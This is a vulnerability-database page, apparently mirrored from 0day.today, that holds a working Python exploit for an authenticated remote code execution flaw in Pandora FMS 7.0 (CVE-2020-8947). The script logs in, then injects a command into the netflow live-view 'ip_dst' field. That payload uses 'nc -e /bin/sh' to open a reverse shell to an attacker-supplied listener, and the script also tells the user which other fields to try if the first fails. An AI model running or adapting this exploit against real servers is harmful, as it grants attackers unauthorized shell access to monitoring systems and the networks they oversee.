Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtEngin Demirbilek1337DAY-ID-33963
HistoryFeb 13, 2020 - 12:00 a.m.

PANDORAFMS 7.0 - Authenticated Remote Code Execution Exploit

2020-02-1300:00:00
Engin Demirbilek
0day.today
51

0.104 Low

EPSS

Percentile

95.0%

JSON

Exploit for php platform in category web applications

# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution
# Exploit Author: Engin Demirbilek
# Vendor homepage: http://pandorafms.org/
# Version: 7.0
# Software link: https://pandorafms.org/features/free-download-monitoring-software/
# Tested on: CentOS
# CVE: CVE-2020-8947

#!/bin/python
'''
PANDORAFMS 7.0 Authenticated Remote Code Execution x4
This exploits can be edited to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS.
incase default vulnerable variable won't work, change the position of payload to  one of the following ip_src, dst_port, src_port

Author: Engin Demirbilek
Github: github.com/EnginDemirbilek
CVE: CVE-2020-8947

'''
import requests
import sys

if len(sys.argv) < 6:
	print "Usage: ./exploit.py http://url username password listenerIP listenerPort"
	exit()

url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
payload = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#'

login = {
	'nick':user,
	'pass':password,
	'login_button':'Login'
}
req = requests.Session()
print "Sendin login request ..."
login = req.post(url+"/pandora_console/index.php?login=1", data=login)

payload = {
	'date':"",
	'time':"",
	'period':"",
	'interval_length':"",
	'chart_type':"",
	'max_aggregates':"1",
        'address_resolution':"0",
        'name':"",
        'assign_group':"0",
        'filter_type':"0",
        'filter_id':"0",
        'filter_selected':"0",
        'ip_dst':payload,
	'ip_src':"",
	'dst_port':"",
	'src_port':"",
	'advanced_filter':"",
	'aggregate':"dstip",
	'router_ip':"",
	'output':"bytes",
	'draw_button':"Draw"
}

print "[+] Sendin exploit ..."

exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={
'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded'})

if exploit.status_code == 200:
	print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port."
else:
	print "[-] Couldn't send the HTTP request, try again."

#  0day.today [2020-02-21]  #

Related

packetstorm 1
exploitpack 1
exploitdb 1
prion 1
cvelist 1
cve 1
nvd 1
packetstorm
packetstorm
Pandora FMS 7.0 Authenticated Remote Code Execution
2020-02-13 00:00:00
exploitpack
exploitpack
PANDORAFMS 7.0 - Authenticated Remote Code Execution
2020-02-13 00:00:00
exploitdb
exploitdb
PANDORAFMS 7.0 - Authenticated Remote Code Execution
2020-02-13 00:00:00
prion
prion
Design/Logic Flaw
2020-02-12 18:15:00
cvelist
cvelist
CVE-2020-8947
2020-02-12 17:52:37
cve
cve
CVE-2020-8947
2020-02-12 18:15:10
nvd
nvd
CVE-2020-8947
2020-02-12 18:15:10

0.104 Low

EPSS

Percentile

95.0%

JSON
Related for 1337DAY-ID-33963
packetstorm1exploitpack1exploitdb1prion1cvelist1cve1nvd1